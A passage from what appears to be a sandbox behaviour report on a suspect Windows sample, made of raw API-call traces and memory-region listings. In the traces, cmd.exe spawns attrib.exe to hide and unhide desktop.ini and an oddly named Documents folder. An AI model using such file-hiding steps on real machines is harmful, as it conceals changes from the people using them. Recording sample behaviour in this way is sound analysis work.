lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: 
lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, 
lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.978] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.996] _close (_FileHandle=4) returned 0 [0128.996] FindNextFileW (in: hFindFile=0x34e760, lpFindFileData=0x2af0a0 | out: lpFindFileData=0x2af0a0) returned 0 [0128.997] GetLastError () returned 0x12 [0128.997] FindClose (in: hFindFile=0x34e760 | out: hFindFile=0x34e760) returned 1 [0128.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0128.999] _close (_FileHandle=3) returned 0 [0129.000] GetConsoleTitleW (in: lpConsoleTitle=0x2af4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.000] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.000] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.000] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.000] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.000] GetLastError () returned 0x2 [0129.000] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.000] GetLastError () returned 0x2 [0129.000] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0x352ed0 [0129.000] FindClose (in: 
hFindFile=0x352ed0 | out: hFindFile=0x352ed0) returned 1 [0129.001] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.001] GetLastError () returned 0x2 [0129.001] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0x352ed0 [0129.001] FindClose (in: hFindFile=0x352ed0 | out: hFindFile=0x352ed0) returned 1 [0129.001] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.001] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.001] GetConsoleTitleW (in: lpConsoleTitle=0x2af26c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.001] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af1bc | out: lpAttributeList=0x2af0f4, lpSize=0x2af1bc) returned 1 [0129.001] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af1b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af0f4, lpPreviousValue=0x0) returned 1 [0129.001] GetStartupInfoW (in: lpStartupInfo=0x2af0b0 | out: lpStartupInfo=0x2af0b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0129.001] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.001] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af150*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af19c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessInformation=0x2af19c*(hProcess=0x4c, hThread=0x50, dwProcessId=0x69c, dwThreadId=0x720)) returned 1 [0129.003] CloseHandle (hObject=0x50) returned 1 [0129.003] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.003] GetEnvironmentStringsW () returned 0x352ed0* [0129.003] FreeEnvironmentStringsW (penv=0x352ed0) returned 1 [0129.003] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0129.115] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af090 | out: lpExitCode=0x2af090*=0x0) returned 1 [0129.115] CloseHandle (hObject=0x4c) returned 1 [0129.115] _vsnwprintf (in: _Buffer=0x2af1d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af09c | out: _Buffer="00000000") returned 8 [0129.115] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.115] GetEnvironmentStringsW () returned 0x352ed0* [0129.115] FreeEnvironmentStringsW (penv=0x352ed0) returned 1 [0129.115] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.115] GetEnvironmentStringsW () returned 0x352ed0* [0129.115] FreeEnvironmentStringsW (penv=0x352ed0) returned 1 [0129.115] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0f4 | out: 
lpAttributeList=0x2af0f4) [0129.115] GetConsoleTitleW (in: lpConsoleTitle=0x2af4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.116] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.116] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.116] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.116] GetLastError () returned 0x2 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.116] GetLastError () returned 0x2 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0x34e760 [0129.116] FindClose (in: hFindFile=0x34e760 | out: hFindFile=0x34e760) returned 1 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.117] GetLastError () returned 0x2 [0129.117] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) 
returned 0x34e760 [0129.117] FindClose (in: hFindFile=0x34e760 | out: hFindFile=0x34e760) returned 1 [0129.117] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.117] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.117] GetConsoleTitleW (in: lpConsoleTitle=0x2af26c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.117] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af1bc | out: lpAttributeList=0x2af0f4, lpSize=0x2af1bc) returned 1 [0129.117] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af1b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af0f4, lpPreviousValue=0x0) returned 1 [0129.117] GetStartupInfoW (in: lpStartupInfo=0x2af0b0 | out: lpStartupInfo=0x2af0b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0129.117] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.117] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af150*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x2af19c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessInformation=0x2af19c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x510, dwThreadId=0x670)) returned 1 [0129.118] CloseHandle (hObject=0x4c) returned 1 [0129.118] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.118] GetEnvironmentStringsW () returned 0x353930* [0129.119] FreeEnvironmentStringsW (penv=0x353930) returned 1 [0129.119] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0129.261] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af090 | out: lpExitCode=0x2af090*=0x0) returned 1 [0129.261] CloseHandle (hObject=0x50) returned 1 [0129.261] _vsnwprintf (in: _Buffer=0x2af1d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af09c | out: _Buffer="00000000") returned 8 [0129.261] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.261] GetEnvironmentStringsW () returned 0x353930* [0129.261] FreeEnvironmentStringsW (penv=0x353930) returned 1 [0129.261] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.261] GetEnvironmentStringsW () returned 0x353930* [0129.261] FreeEnvironmentStringsW (penv=0x353930) returned 1 [0129.261] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0f4 | out: lpAttributeList=0x2af0f4) [0129.261] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.261] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.261] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.261] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.261] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.261] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.262] SetConsoleInputExeNameW () returned 0x1 [0129.262] GetConsoleOutputCP () returned 0x1b5 [0129.262] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0129.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.262] exit (_Code=0) Process: id = "89" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16860" os_pid = "0x6bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0x910" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10879 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10880 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10881 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 10882 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 10883 start_va = 0x230000 end_va = 0x236fff entry_point = 0x230000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10884 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 
10885 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10886 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10887 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 10888 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10889 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10890 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10891 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10892 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10893 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 10894 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10895 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10896 
start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10897 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10898 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10899 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10900 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10901 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10902 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10903 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10904 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 10905 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10906 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 10907 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10908 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 146 os_tid = 0x514 Process: id = "90" image_name = "attrib.exe" filename = 